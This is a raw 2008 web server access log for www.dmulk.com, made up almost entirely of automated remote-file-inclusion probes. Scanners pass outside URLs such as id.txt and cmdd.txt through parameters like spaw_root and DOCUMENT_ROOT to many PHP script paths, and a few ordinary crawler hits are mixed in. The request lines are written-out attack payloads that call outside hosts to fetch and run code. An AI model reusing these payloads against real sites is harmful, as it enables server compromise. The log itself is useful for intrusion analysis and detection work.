58.215.79.214 - - [24/Jul/2008:08:19:12 -0700] "GET /logs//modules/xfsection/modify.php?dir_module=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
148.202.29.8 - - [24/Jul/2008:08:19:31 -0700] "GET /logs/access.log//becommunity/community/index.php?pageurl=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
148.202.29.8 - - [24/Jul/2008:08:19:32 -0700] "GET //becommunity/community/index.php?pageurl=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
148.202.29.8 - - [24/Jul/2008:08:19:32 -0700] "GET /logs//becommunity/community/index.php?pageurl=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
67.205.68.170 - - [24/Jul/2008:08:19:35 -0700] "GET /logs/access_080123.log/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.metal-headz.co.uk//modules/coppermine/include/.../.../.../.../.../.../idsc1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.68.170 - - [24/Jul/2008:08:19:35 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.metal-headz.co.uk//modules/coppermine/include/.../.../.../.../.../.../idsc1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
67.205.68.170 - - [24/Jul/2008:08:19:35 -0700] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.metal-headz.co.uk//modules/coppermine/include/.../.../.../.../.../.../idsc1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [24/Jul/2008:08:19:38 -0700] "GET /logs/access_071218.log//admin/spaw/spaw_control.class.php?spaw_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
85.25.149.223 - - [24/Jul/2008:08:19:50 -0700] "GET /logs/access.log/errors.php?error=http://capanna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.97.5.171 - - [24/Jul/2008:08:19:50 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.149.223 - - [24/Jul/2008:08:19:50 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://capanna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.223 - - [24/Jul/2008:08:19:50 -0700] "GET /errors.php?error=http://capanna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.97.5.171 - - [24/Jul/2008:08:19:50 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.149.223 - - [24/Jul/2008:08:19:50 -0700] "GET /logs/errors.php?error=http://capanna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.223 - - [24/Jul/2008:08:19:51 -0700] "GET /logs/access.log/errors.php?error=http://capanna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.223 - - [24/Jul/2008:08:19:51 -0700] "GET /errors.php?error=http://capanna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.223 - - [24/Jul/2008:08:19:51 -0700] "GET /logs/errors.php?error=http://capanna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.223 - - [24/Jul/2008:08:19:54 -0700] "GET /logs/access.log/errors.php?error=http://capanna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.223 - - [24/Jul/2008:08:19:54 -0700] "GET //index.php?DOCUMENT_ROOT=http://capanna.altervista.org/id.txt? HTTP/1.1" 200 18409 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.223 - - [24/Jul/2008:08:19:55 -0700] "GET /errors.php?error=http://capanna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.223 - - [24/Jul/2008:08:19:55 -0700] "GET /logs/errors.php?error=http://capanna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.223 - - [24/Jul/2008:08:19:55 -0700] "GET /logs/access.log/errors.php?error=http://capanna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.223 - - [24/Jul/2008:08:19:55 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://capanna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.223 - - [24/Jul/2008:08:19:55 -0700] "GET /errors.php?error=http://capanna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.223 - - [24/Jul/2008:08:19:55 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://capanna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.223 - - [24/Jul/2008:08:19:56 -0700] "GET /logs/errors.php?error=http://capanna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
58.97.5.171 - - [24/Jul/2008:08:19:56 -0700] "GET /logs/access_071230.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.97.5.171 - - [24/Jul/2008:08:19:57 -0700] "GET /modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
58.97.5.171 - - [24/Jul/2008:08:19:57 -0700] "GET /logs/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
85.25.149.223 - - [24/Jul/2008:08:19:59 -0700] "GET //index.php?DOCUMENT_ROOT=http://capanna.altervista.org/id.txt? HTTP/1.1" 200 18409 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.223 - - [24/Jul/2008:08:20:00 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://capanna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.223 - - [24/Jul/2008:08:20:02 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://capanna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.223 - - [24/Jul/2008:08:20:06 -0700] "GET //index.php?DOCUMENT_ROOT=http://capanna.altervista.org/id.txt? HTTP/1.1" 200 18409 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.223 - - [24/Jul/2008:08:20:07 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://capanna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
82.78.216.197 - - [24/Jul/2008:08:20:12 -0700] "GET /logs/access_080110.log//admin/spaw/spaw_control.class.php?spaw_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
148.202.29.8 - - [24/Jul/2008:08:20:30 -0700] "GET //admin/classes/TplLoad.php?full_path_to_public_program=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.129.33.59 - - [24/Jul/2008:08:20:36 -0700] "GET /logs/access_080329.log/errors.php?error=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
148.202.29.8 - - [24/Jul/2008:08:20:36 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
98.129.33.59 - - [24/Jul/2008:08:20:36 -0700] "GET /errors.php?error=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
98.129.33.59 - - [24/Jul/2008:08:20:36 -0700] "GET /logs/errors.php?error=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.188 - - [24/Jul/2008:08:20:48 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [24/Jul/2008:08:20:48 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
203.22.204.188 - - [24/Jul/2008:08:20:48 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
151.1.32.20 - - [24/Jul/2008:08:20:48 -0700] "GET /logs/get_header.php?vwar_root=http://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
151.1.32.20 - - [24/Jul/2008:08:20:48 -0700] "GET /get_header.php?vwar_root=http://home.bellavillapattaya.com/modul/mic.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
85.25.149.223 - - [24/Jul/2008:08:20:52 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://capanna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.223 - - [24/Jul/2008:08:20:53 -0700] "GET //index.php?DOCUMENT_ROOT=http://capanna.altervista.org/id.txt? HTTP/1.1" 500 374 "-" "libwww-perl/5.805" "www.dmulk.com"
85.25.149.223 - - [24/Jul/2008:08:20:53 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://capanna.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.150.164.25 - - [24/Jul/2008:08:20:58 -0700] "GET /logs/access_080313.log%20/?sourcedir=http://prunette.com/editor/cmdd.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
64.150.164.25 - - [24/Jul/2008:08:20:58 -0700] "GET /logs/?sourcedir=http://prunette.com/editor/cmdd.txt?? HTTP/1.1" 200 57423 "-" "libwww-perl/5.803" "www.dmulk.com"
64.150.164.25 - - [24/Jul/2008:08:20:58 -0700] "GET /?sourcedir=http://prunette.com/editor/cmdd.txt?? HTTP/1.1" 500 374 "-" "libwww-perl/5.803" "www.dmulk.com"
88.84.151.157 - - [24/Jul/2008:08:21:04 -0700] "GET /logs/access.log//aedating4CMS.php?dir[inc]=http://www.thecornerstone.net/calendar/languages/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
62.112.193.46 - - [24/Jul/2008:08:21:12 -0700] "GET /logs/access.log%20//index.php?DOCUMENT_ROOT=http://www.metal-headz.co.uk/modules/coppermine/include/.../.../.../.../.../.../idsc5.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.188 - - [24/Jul/2008:08:21:18 -0700] "GET /logs/access_080110.log//admin/spaw/spaw_control.class.php?spaw_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
209.51.219.170 - - [24/Jul/2008:08:21:25 -0700] "GET /errors.php?error=http://www.foolishmovies.helloweb.eu/fastidio_id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
58.215.79.214 - - [24/Jul/2008:08:21:25 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.215.79.214 - - [24/Jul/2008:08:21:26 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.215.79.214 - - [24/Jul/2008:08:21:27 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.215.79.214 - - [24/Jul/2008:08:21:30 -0700] "GET /logs/access_071218.log//admin/spaw/spaw_control.class.php?spaw_root=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.22.204.188 - - [24/Jul/2008:08:21:35 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.78.216.197 - - [24/Jul/2008:08:21:40 -0700] "GET /logs/access_080110.log//admin/spaw/spaw_control.class.php?spaw_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:21:41 -0700] "GET /logs/access_080329.log/errors.php?error=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:21:41 -0700] "GET /logs/access_080329.log/errors.php?error=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:21:41 -0700] "GET /logs/access_080329.log/errors.php?error=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:21:41 -0700] "GET /logs/access_080329.log/errors.php?error=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:21:41 -0700] "GET /logs/access_080329.log/errors.php?error=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:21:42 -0700] "GET /errors.php?error=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:21:42 -0700] "GET /errors.php?error=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:21:42 -0700] "GET /errors.php?error=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:21:42 -0700] "GET /errors.php?error=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:21:42 -0700] "GET /errors.php?error=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:21:42 -0700] "GET /logs/errors.php?error=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:21:42 -0700] "GET /logs/errors.php?error=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:21:42 -0700] "GET /logs/errors.php?error=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:21:42 -0700] "GET /logs/errors.php?error=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
77.222.40.49 - - [24/Jul/2008:08:21:42 -0700] "GET /logs/errors.php?error=http://www.rospatent.com/file/id2.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
203.22.204.188 - - [24/Jul/2008:08:21:53 -0700] "GET /logs/access_080329.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
74.6.18.246 - - [24/Jul/2008:08:22:11 -0700] "GET /bikes/dteel/WeSTOC07/?S=A HTTP/1.0" 200 690 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.205.68.170 - - [24/Jul/2008:08:22:13 -0700] "GET /phpffl/phpffl_webfiles/program_files/livedraft/livedraft.php?PHPFFL_FILE_ROOT=http://www.metal-headz.co.uk//modules/coppermine/include/.../.../.../.../.../.../idsc1.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
82.78.216.197 - - [24/Jul/2008:08:22:14 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
82.78.216.197 - - [24/Jul/2008:08:22:14 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
82.78.216.197 - - [24/Jul/2008:08:22:15 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
148.202.29.8 - - [24/Jul/2008:08:22:32 -0700] "GET /logs/access_080129.log//becommunity/community/index.php?pageurl=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
82.78.216.197 - - [24/Jul/2008:08:22:33 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
82.78.216.197 - - [24/Jul/2008:08:22:34 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
82.78.216.197 - - [24/Jul/2008:08:23:14 -0700] "GET /logs/access_080329.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
151.11.24.250 - - [24/Jul/2008:08:23:27 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://rotihidup.com/components/com_rss/ma??? HTTP/1.1" 404 275 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
151.11.24.250 - - [24/Jul/2008:08:23:29 -0700] "GET //index.php?DOCUMENT_ROOT=http://rotihidup.com/components/com_rss/ma??? HTTP/1.1" 200 18441 "-" "Mozilla/4.7C-CCK-MCD {C-UDP; EBM-APPLE} (Macintosh; I; PPC)" "www.dmulk.com"
80.231.0.98 - - [24/Jul/2008:08:23:48 -0700] "GET /logs/access_080315.log//admin/business_inc/saveserver.php?thisdir=http://www.shaker-diffusion.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.0.98 - - [24/Jul/2008:08:23:48 -0700] "GET //admin/business_inc/saveserver.php?thisdir=http://www.shaker-diffusion.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.0.98 - - [24/Jul/2008:08:23:48 -0700] "GET /logs//admin/business_inc/saveserver.php?thisdir=http://www.shaker-diffusion.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
80.231.0.98 - - [24/Jul/2008:08:23:58 -0700] "GET /logs/access_080313.log//admin/business_inc/saveserver.php?thisdir=http://www.shaker-diffusion.com/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.78.216.197 - - [24/Jul/2008:08:24:27 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
203.22.204.188 - - [24/Jul/2008:08:24:29 -0700] "GET //includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:08:24:42 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:08:24:46 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:08:24:47 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
148.202.29.8 - - [24/Jul/2008:08:24:48 -0700] "GET //becommunity/community/index.php?pageurl=http://star.jbsc.ac.kr/technote/config/menu/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.dmulk.com"
58.97.5.171 - - [24/Jul/2008:08:24:54 -0700] "GET /logs/access_071213.log/modules/vwar/convert/mvcw_conver.php?step=1&vwar_root=http://lizartdisplay.com/di?? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:08:24:54 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:08:24:58 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:08:25:00 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
58.227.193.211 - - [24/Jul/2008:08:25:13 -0700] "GET //index.php?option=com_dbquery&Itemid=&mosConfig_absolute_path=ftp://212.11.127.86/tmp/trem/oldbisok?? HTTP/1.1" 200 18497 "-" "libwww-perl/5.79" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:08:25:21 -0700] "GET /logs/access.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.22.204.188 - - [24/Jul/2008:08:25:22 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:08:25:24 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
87.106.102.20 - - [24/Jul/2008:08:25:24 -0700] "GET /logs/access.log/errors.php?error=http://www.geocities.com/fjr1938/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.102.20 - - [24/Jul/2008:08:25:24 -0700] "GET /errors.php?error=http://www.geocities.com/fjr1938/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.106.102.20 - - [24/Jul/2008:08:25:25 -0700] "GET /logs/errors.php?error=http://www.geocities.com/fjr1938/on.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:08:25:27 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
65.55.211.26 - - [24/Jul/2008:08:25:35 -0700] "GET /presto/?N=D HTTP/1.1" 200 526 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:08:25:38 -0700] "GET /logs/access_071219.log//admin/spaw/spaw_control.class.php?spaw_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:08:25:40 -0700] "GET //admin/spaw/spaw_control.class.php?spaw_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:08:25:43 -0700] "GET /logs//admin/spaw/spaw_control.class.php?spaw_root=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
82.78.216.197 - - [24/Jul/2008:08:25:44 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
82.78.216.197 - - [24/Jul/2008:08:25:44 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
200.207.2.62 - - [24/Jul/2008:08:25:46 -0700] "GET /logs/access.log//inc/cmses/aedatingCMS.php?dir%5Binc%5D=http://www.felixtur.com.br/principal/cache/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
82.78.216.197 - - [24/Jul/2008:08:25:54 -0700] "GET /logs//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
82.78.216.197 - - [24/Jul/2008:08:25:55 -0700] "GET //include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://poko.club.hu/id1.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.813" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:08:26:45 -0700] "GET /logs/access.log//index.php?DOCUMENT_ROOT=http://www.dpfbrasil.net63.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:08:26:47 -0700] "GET //index.php?DOCUMENT_ROOT=http://www.dpfbrasil.net63.net/cmdAsc.txt????? HTTP/1.1" 200 18443 "-" "libwww-perl/5.65" "www.dmulk.com"
212.92.130.236 - - [24/Jul/2008:08:26:48 -0700] "GET /logs//index.php?DOCUMENT_ROOT=http://www.dpfbrasil.net63.net/cmdAsc.txt????? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.dmulk.com"
74.6.18.246 - - [24/Jul/2008:08:27:28 -0700] "GET /bikes/dteel/WeSTOC07/?D=D HTTP/1.0" 200 690 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
163.17.62.3 - - [24/Jul/2008:08:28:04 -0700] "GET /logs/access_080329.log//include/monitoring/engine/MakeXML4statusCounter.php?fileOreonConf=http://jelna.as.ro/id1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
